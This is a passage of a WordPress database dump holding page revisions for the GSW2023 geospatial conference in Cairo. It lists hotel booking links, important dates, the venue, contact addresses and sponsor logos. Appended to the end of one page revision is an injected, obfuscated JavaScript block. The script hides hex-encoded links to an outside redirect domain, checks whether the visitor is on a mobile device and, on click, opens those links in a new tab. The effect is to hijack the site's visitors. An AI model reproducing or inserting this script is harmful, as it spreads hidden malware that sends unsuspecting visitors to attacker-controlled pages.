link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:17:57','2023-08-16 00:17:57','',3066,'https://gsw2023.com/?p=5243',0,'revision','',0),
(5244,1,'2023-08-16 00:21:38','2023-08-16 00:21:38','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row 